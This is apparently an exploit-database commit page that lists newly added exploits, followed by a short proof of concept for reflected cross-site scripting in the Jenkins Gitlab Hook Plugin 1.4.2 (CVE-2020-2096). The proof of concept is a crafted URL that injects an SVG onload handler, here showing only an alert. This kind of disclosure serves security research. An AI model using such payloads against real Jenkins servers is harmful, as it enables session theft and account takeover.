1a9ce31a5f
12 changes to exploits/shellcodes SunOS 5.10 Generic_147148-26 - Local Privilege Escalation Microsoft Windows - CryptoAPI (Crypt32.dll) Elliptic Curve Cryptography (ECC) Spoof Code-Signing Certificate Microsoft Windows 10 (19H1 1901 x64) - 'ws2ifsl.sys' Use After Free Local Privilege Escalation (kASLR kCFG SMEP) Sagemcom F@ST 3890 (50_10_19-T1) Cable Modem - 'Cable Haunt' Remote Code Execution VICIDIAL Call Center Suite 2.2.1-237 - Multiple Vulnerabilities ManageEngine EventLog Analyzer 9.0 - Directory Traversal / Cross-Site Scripting ManageEngine Firewall Analyzer 8.0 - Directory Traversal / Cross-Site Scripting VICIDIAL Call Center Suite - Multiple SQL Injections Online Book Store 1.0 - 'bookisbn' SQL Injection WordPress Plugin Postie 1.9.40 - Persistent Cross-Site Scripting Rukovoditel Project Management CRM 2.5.2 - 'reports_id' SQL Injection Jenkins Gitlab Hook Plugin 1.4.2 - Reflected Cross-Site Scripting Online Book Store 1.0 - Arbitrary File Upload Tautulli 2.1.9 - Denial of Service ( Metasploit ) Citrix Application Delivery Controller (ADC) and Gateway 13.0 - Path Traversal Rukovoditel Project Management CRM 2.5.2 - 'entities_id' SQL Injection Rukovoditel Project Management CRM 2.5.2 - 'filters' SQL Injection
9 lines
No EOL
379 B
Text
9 lines
No EOL
379 B
Text
# Exploit Title: Jenkins Gitlab Hook Plugin 1.4.2 - Reflected Cross-Site Scripting
|
|
# Exploit Author: Ai Ho
|
|
# Vendor Homepage : https://jenkins.io/
|
|
# Effective version : Gitlab Hook Plugin 1.4.2 and earlier
|
|
# References: https://jenkins.io/security/advisory/2020-01-15/
|
|
# CVE: CVE-2020-2096
|
|
|
|
# PoC:
|
|
http://JENKINS_IP/gitlab/build_now%3Csvg/onload=alert(document.domain)%3E |